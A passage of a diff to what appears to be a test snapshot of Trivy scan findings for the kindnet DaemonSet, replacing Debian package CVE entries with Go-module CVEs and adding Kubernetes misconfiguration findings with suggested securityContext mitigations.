"https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc3", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20201112073958-5cba982894dd", + "packageName": "golang.org/x/sys", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", - }, - { - "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", - ], - }, - "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.4", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.4", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "MEDIUM", @@ -95336,52 +96161,28 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", ], }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -95389,97 +96190,231 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": 